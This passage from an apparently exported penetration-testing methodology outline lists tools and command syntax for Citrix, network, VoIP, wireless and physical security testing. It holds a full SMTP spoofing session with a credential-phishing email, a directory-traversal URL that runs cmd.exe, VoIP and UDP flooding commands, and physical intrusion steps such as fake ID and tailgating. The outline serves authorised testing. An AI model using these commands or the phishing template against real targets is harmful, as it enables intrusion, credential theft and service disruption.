10.4.3.4.3. Untitled

10.4.3.5. Keyboard Shortcuts/ Hotkeys

10.4.3.5.1. Ctrl + h – View History

10.4.3.5.2. Ctrl + n – New Browser

10.4.3.5.3. Shift + Left Click – New Browser

10.4.3.5.4. Ctrl + o – Internet Address (browse feature)

10.4.3.5.5. Ctrl + p – Print (to file)

10.4.3.5.6. Right Click (Shift + F10)

10.4.3.5.7. F1 – Jump to URL

10.4.3.5.8. SHIFT+F1: Local Task List

10.4.3.5.9. SHIFT+F2: Toggle Title Bar

10.4.3.5.10. SHIFT+F3: Close Remote Application

10.4.3.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

10.4.3.5.12. CTRL+F2: Remote Task List

10.4.3.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

10.4.3.5.14. ALT+F2: Cycle through programs

10.4.3.5.15. ALT+PLUS: Alt+TAB

10.4.3.5.16. ALT+MINUS: ALT+SHIFT+TAB

10.5. Brute Force

10.5.1. bforce.js

10.5.1.1. bforce.js TCPBrowserAddress=ip_address usernames=user1,user2 passwords=pass1,pass2

10.5.1.2. bforce.js HTTPBrowserAddress=ip_address userfile=file.txt passfile=file.txt

10.5.1.3. Untitled

10.6. Review Configuration Files

10.6.1. Application server configuration file

10.6.1.1. appsrv.ini

10.6.1.1.1. Location

10.6.1.1.2. World writeable

10.6.1.1.3. Review other files

10.6.1.1.4. Sample file

10.6.2. Program Neighborhood configuration file

10.6.2.1. pn.ini

10.6.2.1.1. Location

10.6.2.1.2. Review other files

10.6.2.1.3. Sample file

10.6.3. Citrix ICA client configuration file

10.6.3.1. wfclient.ini

10.6.3.1.1. Location

10.6.3.1.2. Sample file

10.7. References

10.7.1. Vulnerabilities

10.7.1.1. Art of Hacking

10.7.1.2. Common Vulnerabilities and Exploits (CVE)

10.7.1.2.1. Untitled

10.7.1.2.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=citrix

10.7.1.3. OSVDB

10.7.1.3.1. http://osvdb.org/search/search?search[vuln_title]=Citrix&search[text_type]=titles&search[s_date]=&search[e_date]=&search[refid]=&search[referencetypes]=&search[vendors]=&kthx=searchSecunia

10.7.1.4. Secunia

10.7.1.4.1. http://secunia.com/advisories/search/?search=citrix

10.7.1.5. Security-database.com

10.7.1.5.1. http://www.security-database.com/cgi-bin/search-sd.cgi?q=Citrix

10.7.1.6. SecurityFocus

10.7.2. Support

10.7.2.1. Citrix

10.7.2.1.1. Knowledge Base

10.7.2.1.2. Forum

10.7.2.2. Thinworld

10.7.3. Exploits

10.7.3.1. Milw0rm

10.7.3.1.1. http://www.milw0rm.com/search.php

10.7.3.2. Art of Hacking

10.7.3.2.1. Citrix

10.7.4. Tutorials/ Presentations

10.7.4.1. Carnal0wnage

10.7.4.1.1. Carnal0wnage Blog: Citrix Hacking

10.7.4.2. Foundstone

10.7.4.2.1. Got Citrix, Hack IT

10.7.4.3. GNUCitizen

10.7.4.3.1. Hacking CITRIX - the forceful way

10.7.4.3.2. 0day: Hacking secured CITRIX from outside

10.7.4.3.3. CITRIX: Owning the Legitimate Backdoor

10.7.4.3.4. Remote Desktop Command Fixation Attacks

10.7.4.4. Packetstormsecurity

10.7.4.4.1. Hacking Citrix

10.7.4.5. Insomniac Security

10.7.4.5.1. Hacking Citrix

10.7.4.6. Aditya Sood

10.7.4.6.1. Rolling Balls - Can you hack clients

10.7.4.7. BlackHat

10.7.4.7.1. Client Side Security

10.7.5. Tools Resource

10.7.5.1. Zip file containing the majority of tools mentioned in this article into a zip file for easy download/ access

11. Network Backbone

11.1. Generic Toolset

11.1.1. Wireshark (Formerly Ethereal)

11.1.1.1. Passive Sniffing

11.1.1.1.1. Usernames/Passwords

11.1.1.1.2. Email

11.1.1.1.3. FTP

11.1.1.1.4. HTTP

11.1.1.1.5. HTTPS

11.1.1.1.6. RDP

11.1.1.1.7. VOIP

11.1.1.1.8. Other

11.1.1.2. Filters

11.1.1.2.1. ip.src == ip_address

11.1.1.2.2. ip.dst == ip_address

11.1.1.2.3. tcp.dstport == port_no.

11.1.1.2.4. ! ip.addr == ip_address

11.1.1.2.5. (ip.addr eq ip_address and ip.addr eq ip_address) and (tcp.port eq 1829 and tcp.port eq 1863)

11.1.2. Cain & Abel

11.1.2.1. Active Sniffing

11.1.2.1.1. ARP Cache Poisoning

11.1.2.1.2. DNS Poisoning

11.1.2.1.3. Routing Protocols

11.1.3. Cisco-Torch

11.1.3.1. ./cisco-torch.pl <options> <IP,hostname,network> or ./cisco-torch.pl <options> -F <hostlist>

11.1.4. NTP-Fingerprint

11.1.4.1. perl ntp-fingerprint.pl -t [ip_address]

11.1.5. Yersinia

11.1.6. p0f

11.1.6.1. ./p0f [ -f file ] [ -i device ] [ -s file ] [ -o file ] [ -w file ] [ -Q sock ] [ -u user ] [ -FXVONDUKASCMRqtpvdlr ] [ -c size ] [ -T nn ] [ 'filter rule' ]

11.1.7. Manual Check (Credentials required)

11.1.8. MAC Spoofing

11.1.8.1. mac address changer for windows

11.1.8.2. macchanger

11.1.8.2.1. Random Mac Address:- macchanger -r eth0

11.1.8.3. madmacs

11.1.8.4. smac

11.1.8.5. TMAC

12. Penetration - An exploit usually relates to the existence of some flaw or vulnerability in an application or operating system that if used could lead to privilege escalation or denial of service against the computer system that is being attacked. Exploits can be compiled and used manually or various engines exist that are essentially at the lowest level pre-compiled point and shoot tools. These engines do also have a number of other extra underlying features for more advanced users.

12.1. Password Attacks

12.1.1. Known Accounts

12.1.1.1. Identified Passwords

12.1.1.2. Unidentified Hashes

12.1.2. Default Accounts

12.1.2.1. Identified Passwords

12.1.2.2. Unidentified Hashes

12.2. Exploits

12.2.1. Successful Exploits

12.2.1.1. Accounts

12.2.1.1.1. Passwords

12.2.1.1.2. Groups

12.2.1.1.3. Other Details

12.2.1.2. Services

12.2.1.3. Backdoor

12.2.1.4. Connectivity

12.2.2. Unsuccessful Exploits

12.2.3. Resources

12.2.3.1. Securiteam

12.2.3.1.1. Exploits are sorted by year and must be downloaded individually

12.2.3.2. SecurityForest

12.2.3.2.1. Updated via CVS after initial install

12.2.3.3. GovernmentSecurity

12.2.3.3.1. Need to create and account to obtain access

12.2.3.4. Red Base Security

12.2.3.4.1. Oracle Exploit site only

12.2.3.5. Wireless Vulnerabilities & Exploits (WVE)

12.2.3.5.1. Wireless Exploit Site

12.2.3.6. PacketStorm Security

12.2.3.6.1. Exploits downloadable by month and year but no indexing carried out.

12.2.3.7. SecWatch

12.2.3.7.1. Exploits sorted by year and month, download seperately

12.2.3.8. SecurityFocus

12.2.3.8.1. Exploits must be downloaded individually

12.2.3.9. Metasploit

12.2.3.9.1. Install and regualrly update via svn

12.2.3.10. Milw0rm

12.2.3.10.1. Exploit archived indexed and sorted by port download as a whole - The one to go for!

12.3. Tools

12.3.1. Metasploit

12.3.1.1. Free Extra Modules

12.3.1.1.1. local copy

12.3.2. Manual SQL Injection

12.3.2.1. Understanding SQL Injection

12.3.2.2. SQL Injection walkthrough

12.3.2.3. SQL Injection by example

12.3.2.4. Blind SQL Injection

12.3.2.5. Advanced SQL Injection in SQL Server

12.3.2.6. More Advanced SQL Injection

12.3.2.7. Advanced SQL Injection in Oracle databases

12.3.2.8. SQL Cheatsheets

12.3.2.8.1. Untitled

12.3.3. SQL Power Injector

12.3.4. SecurityForest

12.3.5. SPI Dynamics WebInspect

12.3.6. Core Impact

12.3.7. Cisco Global Exploiter

12.3.8. PIXDos

12.3.8.1. perl PIXdos.pl [ --device=interface ] [--source=IP] [--dest=IP] [--sourcemac=M AC] [--destmac=MAC] [--port=n]

12.3.9. CANVAS

12.3.10. Inguma

13. Server Specific Tests

13.1. Databases

13.1.1. Direct Access Interrogation

13.1.1.1. MS SQL Server

13.1.1.1.1. Ports

13.1.1.1.2. Version

13.1.1.1.3. osql

13.1.1.2. Oracle

13.1.1.2.1. Ports

13.1.1.2.2. TNS Listener

13.1.1.2.3. SQL Plus

13.1.1.2.4. Default Account/Passwords

13.1.1.2.5. Default SID's

13.1.1.3. MySQL

13.1.1.3.1. Ports

13.1.1.3.2. Version

13.1.1.3.3. Users/Passwords

13.1.1.4. DB2

13.1.1.5. Informix

13.1.1.6. Sybase

13.1.1.7. Other

13.1.2. Scans

13.1.2.1. Default Ports

13.1.2.2. Non-Default Ports

13.1.2.3. Instance Names

13.1.2.4. Versions

13.1.3. Password Attacks

13.1.3.1. Sniffed Passwords

13.1.3.1.1. Cracked Passwords

13.1.3.1.2. Hashes

13.1.3.2. Direct Access Guesses

13.1.4. Vulnerability Assessment

13.1.4.1. Automated

13.1.4.1.1. Reports

13.1.4.1.2. Vulnerabilities

13.1.4.2. Manual

13.1.4.2.1. Patch Levels

13.1.4.2.2. Confirmed Vulnerabilities

13.2. Mail

13.2.1. Scans

13.2.2. Fingerprint

13.2.2.1. Manual

13.2.2.2. Automated

13.2.3. Spoofable

13.2.3.1. Telnet spoof

13.2.3.1.1. telnet target_IP 25helo target.commail from: [email protected] to: [email protected]: [email protected]: [192.168.1.1]X-Originating-Email: [[email protected]]MIME-Version: 1.0To: <[email protected]>From: < [email protected] >Subject: Important! Account check requiredContent-Type: text/htmlContent-Transfer-Encoding: 7bitDear Valued Customer,The corporate network has recently gone through a critical update to the Active Directory, we have done this to increase security of the network against hacker attacks to protect your private information. Due to this, you are required to log onto the following website with your current credentials to ensure that your account does not expire.Please go to the following website and log in with your account details. <a href=http://192.168.1.108/hacme.html>www.target.com/login</a>Online Security Manager.Target [email protected]

13.2.4. Relays

13.3. VPN

13.3.1. Scanning

13.3.1.1. 500 UDP IPSEC

13.3.1.2. 1723 TCP PPTP

13.3.1.3. 443 TCP/SSL

13.3.1.4. nmap -sU -PN -p 500 80.75.68.22-27

13.3.1.5. ipsecscan 80.75.68.22 80.75.68.27

13.3.2. Fingerprinting

13.3.2.1. ike-scan --showbackoff 80.75.68.22 80.75.68.27

13.3.3. PSK Crack

13.3.3.1. ikeprobe 80.75.68.27

13.3.3.2. sniff for responses with C&A or ikecrack

13.4. Web

13.4.1. Vulnerability Assessment

13.4.1.1. Automated

13.4.1.1.1. Reports

13.4.1.1.2. Vulnerabilities

13.4.1.2. Manual

13.4.1.2.1. Patch Levels

13.4.1.2.2. Confirmed Vulnerabilities

13.4.2. Permissions

13.4.2.1. PUT /test.txt HTTP/1.0

13.4.2.2. CONNECT mail.another.com:25 HTTP/1.0

13.4.2.3. POST http://mail.another.com:25/ HTTP/1.0Content-Type: text/plainContent-Length: 6

13.4.3. Scans

13.4.4. Fingerprinting

13.4.4.1. Other

13.4.4.2. HTTP

13.4.4.2.1. Commands

13.4.4.2.2. Modules

13.4.4.2.3. File Extensions

13.4.4.3. HTTPS

13.4.4.3.1. Commands

13.4.4.3.2. Commands

13.4.4.3.3. File Extensions

13.4.5. Directory Traversal

13.4.5.1. http://www.target.com/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

14. VoIP Security

14.1. Sniffing Tools

14.1.1. AuthTool

14.1.2. Cain & Abel

14.1.3. Etherpeek

14.1.4. NetDude

14.1.5. Oreka

14.1.6. PSIPDump

14.1.7. SIPomatic

14.1.8. SIPv6 Analyzer

14.1.9. UCSniff

14.1.10. VoiPong

14.1.11. VOMIT

14.1.12. Wireshark

14.1.13. WIST - Web Interface for SIP Trace

14.2. Scanning and Enumeration Tools

14.2.1. enumIAX

14.2.2. fping

14.2.3. IAX Enumerator

14.2.4. iWar

14.2.5. Nessus

14.2.6. Nmap

14.2.7. SIP Forum Test Framework (SFTF)

14.2.8. SIPcrack

14.2.9. sipflanker

14.2.9.1. python sipflanker.py 192.168.1-254

14.2.10. SIP-Scan

14.2.11. SIP.Tastic

14.2.12. SIPVicious

14.2.13. SiVuS

14.2.14. SMAP

14.2.14.1. smap IP_Address/Subnet_Mask

14.2.14.2. smap -o IP_Address/Subnet_Mask

14.2.14.3. smap -l IP_Address

14.2.15. snmpwalk

14.2.16. VLANping

14.2.17. VoIPAudit

14.2.18. VoIP GHDB Entries

14.2.19. VoIP Voicemail Database

14.3. Packet Creation and Flooding Tools

14.3.1. H.323 Injection Files

14.3.2. H225regreject

14.3.3. IAXHangup

14.3.4. IAXAuthJack

14.3.5. IAX.Brute

14.3.6. IAXFlooder

14.3.6.1. ./iaxflood sourcename destinationname numpackets

14.3.7. INVITE Flooder

14.3.7.1. ./inviteflood interface target_user target_domain ip_address_target no_of_packets

14.3.8. kphone-ddos

14.3.9. RTP Flooder

14.3.10. rtpbreak

14.3.11. Scapy

14.3.12. Seagull

14.3.13. SIPBomber

14.3.14. SIPNess

14.3.15. SIPp

14.3.16. SIPsak

14.3.16.1. Tracing paths: - sipsak -T -s sip:[email protected]

14.3.16.2. Options request:- sipsak -vv -s sip:[email protected]

14.3.16.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

14.3.17. SIP-Send-Fun

14.3.18. SIPVicious

14.3.19. Spitter

14.3.20. TFTP Brute Force

14.3.20.1. perl tftpbrute.pl <tftpserver> <filelist> <maxprocesses>

14.3.21. UDP Flooder

14.3.21.1. ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

14.3.22. UDP Flooder (with VLAN Support)

14.3.22.1. ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

14.3.23. Voiphopper

14.4. Fuzzing Tools

14.4.1. Asteroid

14.4.2. Codenomicon VoIP Fuzzers

14.4.3. Fuzzy Packet

14.4.4. Mu Security VoIP Fuzzing Platform

14.4.5. ohrwurm RTP Fuzzer

14.4.6. PROTOS H.323 Fuzzer

14.4.7. PROTOS SIP Fuzzer

14.4.8. SIP Forum Test Framework (SFTF)

14.4.9. Sip-Proxy

14.4.10. Spirent ThreatEx

14.5. Signaling Manipulation Tools

14.5.1. AuthTool

14.5.1.1. ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

14.5.2. BYE Teardown

14.5.3. Check Sync Phone Rebooter

14.5.4. RedirectPoison

14.5.4.1. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:100.77.50.52;line=xtrfgy>"

14.5.5. Registration Adder

14.5.6. Registration Eraser

14.5.7. Registration Hijacker

14.5.8. SIP-Kill

14.5.9. SIP-Proxy-Kill

14.5.10. SIP-RedirectRTP

14.5.11. SipRogue

14.5.12. vnak

14.6. Media Manipulation Tools

14.6.1. RTP InsertSound

14.6.1.1. ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.2. RTP MixSound

14.6.2.1. ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.3. RTPProxy

14.6.4. RTPInject

14.7. Generic Software Suites

14.7.1. OAT Office Communication Server Tool Assessment

14.7.2. EnableSecurity VOIPPACK

14.7.2.1. Note: - Add-on for Immunity Canvas

14.8. References

14.8.1. URL's

14.8.1.1. Common Vulnerabilities and Exploits (CVE)

14.8.1.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=voip

14.8.1.2. Default Passwords

14.8.1.3. Hacking Exposed VoIP

14.8.1.3.1. Tool Pre-requisites

14.8.1.4. VoIPsa

14.8.2. White Papers

14.8.2.1. An Analysis of Security Threats and Tools in SIP-Based VoIP Systems

14.8.2.2. An Analysis of VoIP Security Threats and Tools

14.8.2.3. Hacking VoIP Exposed

14.8.2.4. Security testing of SIP implementations

14.8.2.5. SIP Stack Fingerprinting and Stack Difference Attacks

14.8.2.6. Two attacks against VoIP

14.8.2.7. VoIP Attacks!

14.8.2.8. VoIP Security Audit Program (VSAP)

15. Wireless Penetration

15.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

15.1.1. Site Map

15.1.1.1. RF Map

15.1.1.1.1. Lines of Sight

15.1.1.1.2. Signal Coverage

15.1.1.2. Physical Map

15.1.1.2.1. Triangulate APs

15.1.1.2.2. Satellite Imagery

15.1.2. Network Map

15.1.2.1. MAC Filter

15.1.2.1.1. Authorised MAC Addresses

15.1.2.1.2. Reaction to Spoofed MAC Addresses

15.1.2.2. Encryption Keys utilised

15.1.2.2.1. WEP

15.1.2.2.2. WPA/PSK

15.1.2.2.3. 802.1x

15.1.2.3. Access Points

15.1.2.3.1. ESSID

15.1.2.3.2. BSSIDs

15.1.2.4. Wireless Clients

15.1.2.4.1. MAC Addresses

15.1.2.4.2. Intercepted Traffic

15.2. Wireless Toolkit

15.2.1. Wireless Discovery

15.2.1.1. Aerosol

15.2.1.2. Airfart

15.2.1.3. Aphopper

15.2.1.4. Apradar

15.2.1.5. BAFFLE

15.2.1.6. inSSIDer

15.2.1.7. iWEPPro

15.2.1.8. karma

15.2.1.9. KisMAC-ng

15.2.1.10. Kismet

15.2.1.11. MiniStumbler

15.2.1.12. Netstumbler

15.2.1.13. Vistumbler

15.2.1.14. Wellenreiter

15.2.1.15. Wifi Hopper

15.2.1.16. WirelessMon

15.2.1.17. WiFiFoFum

15.2.2. Packet Capture

15.2.2.1. Airopeek

15.2.2.2. Airpcap

15.2.2.3. Airtraf

15.2.2.4. Apsniff

15.2.2.5. Cain

15.2.2.6. Commview

15.2.2.7. Ettercap

15.2.2.8. Netmon

15.2.2.8.1. nmwifi

15.2.2.9. Wireshark

15.2.3. EAP Attack tools

15.2.3.1. eapmd5pass

15.2.3.1.1. eapmd5pass -w dictionary_file -r eapmd5-capture.dump

15.2.3.1.2. Untitled

15.2.4. Leap Attack Tools

15.2.4.1. asleap

15.2.4.2. thc leap cracker

15.2.4.3. anwrap

15.2.5. WEP/ WPA Password Attack Tools

15.2.5.1. Airbase

15.2.5.2. Aircrack-ptw

15.2.5.3. Aircrack-ng

15.2.5.4. Airsnort

15.2.5.5. cowpatty

15.2.5.6. FiOS Wireless Key Calculator

15.2.5.7. iWifiHack

15.2.5.8. KisMAC-ng

15.2.5.9. Rainbow Tables

15.2.5.10. wep attack

15.2.5.11. wep crack

15.2.5.12. wzcook

15.2.6. Frame Generation Software

15.2.6.1. Airgobbler

15.2.6.2. airpwn

15.2.6.3. Airsnarf

15.2.6.4. Commview

15.2.6.5. fake ap

15.2.6.6. void 11

15.2.6.7. wifi tap

15.2.6.7.1. wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h]

15.2.6.8. FreeRADIUS - Wireless Pwnage Edition

15.2.7. Mapping Software

15.2.7.1. Online Mapping

15.2.7.1.1. WIGLE

15.2.7.1.2. Skyhook

15.2.7.2. Tools

15.2.7.2.1. Knsgem

15.2.8. File Format Conversion Tools

15.2.8.1. ns1 recovery and conversion tool

15.2.8.2. warbable

15.2.8.3. warkizniz

15.2.8.3.1. warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename]

15.2.8.4. ivstools

15.2.9. IDS Tools

15.2.9.1. WIDZ

15.2.9.2. War Scanner

15.2.9.3. Snort-Wireless

15.2.9.4. AirDefense

15.2.9.5. AirMagnet

15.3. WLAN discovery

15.3.1. Unencrypted WLAN

15.3.1.1. Visible SSID

15.3.1.1.1. Sniff for IP range

15.3.1.2. Hidden SSID

15.3.1.2.1. Deauth client

15.3.2. WEP encrypted WLAN

15.3.2.1. Visible SSID

15.3.2.1.1. WEPattack

15.3.2.2. Hidden SSID

15.3.2.2.1. Deauth client

15.3.3. WPA / WPA2 encrypted WLAN

15.3.3.1. Deauth client

15.3.3.1.1. Capture EAPOL handshake

15.3.4. LEAP encrypted WLAN

15.3.4.1. Deauth client

15.3.4.1.1. Break LEAP

15.3.5. 802.1x WLAN

15.3.5.1. Create Rogue Access Point

15.3.5.1.1. Airsnarf

15.3.5.1.2. fake ap

15.3.5.1.3. Hotspotter

15.3.5.1.4. Karma

15.3.5.1.5. Linux rogue AP

15.3.6. Resources

15.3.6.1. URL's

15.3.6.1.1. Wirelessdefence.org

15.3.6.1.2. Russix

15.3.6.1.3. Wardrive.net

15.3.6.1.4. Wireless Vulnerabilities and Exploits (WVE)

15.3.6.2. White Papers

15.3.6.2.1. Weaknesses in the Key Scheduling Algorithm of RC4

15.3.6.2.2. 802.11b Firmware-Level Attacks

15.3.6.2.3. Wireless Attacks from an Intrusion Detection Perspective

15.3.6.2.4. Implementing a Secure Wireless Network for a Windows Environment

15.3.6.2.5. Breaking 104 bit WEP in less than 60 seconds

15.3.6.2.6. PEAP Shmoocon2008 Wright & Antoniewicz

15.3.6.2.7. Active behavioral fingerprinting of wireless devices

15.3.6.3. Common Vulnerabilities and Exploits (CVE)

15.3.6.3.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wireless

16. Physical Security

16.1. Building Security

16.1.1. Meeting Rooms

16.1.1.1. Check for active network jacks.

16.1.1.2. Check for any information in room.

16.1.2. Lobby

16.1.2.1. Check for active network jacks.

16.1.2.2. Does receptionist/guard leave lobby?

16.1.2.3. Accessbile printers? Print test page.

16.1.2.4. Obtain phone/personnel listing.

16.1.3. Communal Areas

16.1.3.1. Check for active network jacks.

16.1.3.2. Check for any information in room.

16.1.3.3. Listen for employee conversations.

16.1.4. Room Security

16.1.4.1. Resistance of lock to picking.

16.1.4.1.1. What type of locks are used in building? Pin tumblers, padlocks, abinet locks, dimple keys, proximity sensors?

16.1.4.2. Ceiling access areas.

16.1.4.2.1. Can you enter the ceiling space (above a suspended ceiling) and enter secured rooms?

16.1.5. Windows

16.1.5.1. Check windows/doors for visible intruderalarm sensors.

16.1.5.2. Check visible areas for sensitive information.

16.1.5.3. Can you video users logging on?

16.2. Perimeter Security

16.2.1. Fence Security

16.2.1.1. Attempt to verify that the whole of the perimeter fence is unbroken.

16.2.2. Exterior Doors

16.2.2.1. If there is no perimeter fence, then determineif exterior doors are secured, guarded andmonitored etc.

16.2.3. Guards

16.2.3.1. Patrol Routines

16.2.3.1.1. Analyse patrol timings to ascertain if any holes exist in the coverage.

16.2.3.2. Communications

16.2.3.2.1. Intercept and analyse guard communications. Determine if the communication methods can be used to aid a physial intrusion.

16.3. Entry Points

16.3.1. Guarded Doors

16.3.1.1. Piggybacking

16.3.1.1.1. Attempt to closely follow employees into thebuilding without having to show valid credentials.

16.3.1.2. Fake ID

16.3.1.2.1. Attempt to use fake ID to gain access.

16.3.1.3. Access Methods

16.3.1.3.1. Test 'out of hours' entry methods

16.3.2. Unguarded Doors

16.3.2.1. Identify all unguardedentry points.

16.3.2.1.1. Are doors secured?

16.3.2.1.2. Check locks for resistance to lock picking.

16.3.3. Windows

16.3.3.1. Check windows/doors for visible intruderalarm sensors.

16.3.3.1.1. Attempt to bypass sensors.

16.3.3.2. Check visible areas for sensitive information.

16.4. Office Waste

16.4.1. Dumpster DivingAttempt to retrieve any useful information from ToE refuse. This may include : printed documents, books, manuals, laptops, PDA's, USB memory devices, CD's, Floppy discs etc

17. Final Report - template

18. Contributors

18.1. Matt Byrne (WirelessDefence.org)

18.1.1. Matt contributed the majority of the Wireless section.

18.2. Arvind Doraiswamy (Paladion.net)

18.2.1. Arvind kindly contributed to the associated MySQL section when coming across TCP Port 3306 open.

18.3. Lee Lawson (Dns.co.uk)

18.3.1. Lee contributed the majority of the Cisco and Social Engineering sections.

18.4. Nabil OUCHN (Security-database.com)

18.4.1. Nabil contributed the AS/400 section.

19. Nouveau sujet

20. Nouveau sujet